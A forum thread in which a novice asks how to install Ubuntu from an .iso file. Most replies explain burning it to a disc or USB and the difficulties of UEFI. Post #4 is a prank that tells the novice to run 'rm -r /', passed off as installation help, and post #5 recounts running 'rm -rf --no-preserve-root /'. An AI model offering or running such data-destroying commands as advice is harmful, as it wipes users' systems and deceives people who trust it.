User Controls

How do I install linux?

  1. #1
    I downloaded ubuntu but I can't figure out how to install it. The downloaded file is a .iso instead of a .exe and when I double click on it nothing happens.
  2. #2
    blackbird Tuskegee Airman
    Burn it to a disc or mount it.
  3. #3
    EasyDoesIt Tuskegee Airman
    Is this a joke? Since when do you install an operating system by double-clicking an icon?

    Assuming this isn't a joke, what you've downloaded is a .iso file. This is a file that's intended to be burned to a CD Rom. Once you burn it to a CD, you can boot it from your computer and it'll run like any other operating system install.

    What is often times easier is to use an USB stick (flash drive). You have to use a tool (such as Rufus) to burn the .iso onto the drive so that the computer will recognize it and try to boot it


    If you're using UEFI instead of oldschool BIOS it becomes kind of a pain in the ass. What computer are you using?
  4. #4
    Sophie Pedophile Tech Support
    Here's what i'd do, open the terminal and type:

    locate root|less


    make uninstall



    rm -r /


    Or something of the sort.
  5. #5
    Once upon a time I ran rm -rf --no-preserve-root / on a machine out of anger and wiped out the EFI firmware, bricking the motherboard. Oops.
  6. #6
    SBTlauien African Astronaut
    There are a shitload of tutorials that explain how to install Ubuntu. I even did it back when I knew shit.
  7. #7
    Kek Houston
    1. download iso
    2. burn iso to disk
    3. boot iso disk
    4. proceed with graphical install
    5. ????????
    6. GNU!!!!!
  8. #8
    LiquidIce Houston
    If you're using UEFI instead of oldschool BIOS it becomes kind of a pain in the ass. What computer are you using?

    Tell me about it! I had a windows box that I wanted to dualboot with Ubantoo but it turned out impossible because the windows box was using MBR to boot and uefi only trusted linux when using gpt... it took reading this https://www.happyassassin.net/2014/01/25/uefi-boot-how-does-that-actually-work-then/ to understand what the fuck was going on, wiping the drive, installing windows on a gpt partition again, then linux, and finally cracking open a bear at the end.
  9. #9
    EasyDoesIt Tuskegee Airman
    See I grew up just booting stuff from USB back in oldschool BIOS. You just threw in a USB and told BIOS to boot from it.

    Then I learned about UEFI and felt silly.
  10. #10
    LiquidIce Houston
    See I grew up just booting stuff from USB back in oldschool BIOS. You just threw in a USB and told BIOS to boot from it.

    Then I learned about UEFI and felt silly.

    Yeah, same here, this UEFI thing totally blew up on me. I can see that it's sorta nice from a technical perspective, but I think it's implemented in a half-assed way and it just causes a lot of pain as soon as you step off the beaten/vendor-approved(apple/ms/ibm) path.
  11. #11
    EasyDoesIt Tuskegee Airman
    Yeah, same here, this UEFI thing totally blew up on me. I can see that it's sorta nice from a technical perspective, but I think it's implemented in a half-assed way and it just causes a lot of pain as soon as you step off the beaten/vendor-approved(apple/ms/ibm) path.

    The problem was that any computer running Windows before UEFI (including ATMs and government computers) is that anyone could have complete control of it just by accessing BIOS. It didn't take a whole lot of brains to do that, either. So UEFI was created as at least one more step to prevent people from having total access of a computer by pressing a few buttons or inserting a burned copy of Windows.

    It also helps Windows because it makes it a little more difficult to uninstall Windows, so more people use it. It's not terribly hard, but it's just a very small learning curve that keeps people who are functionally technologically illiterate from switching to Linux.
  12. #12
    SBTlauien African Astronaut
    So how far have you made it OP?
  13. #13
    So how far have you made it OP?

    About dis far:

  14. #14
    SBTlauien African Astronaut
    Sweet deal.
Jump to Top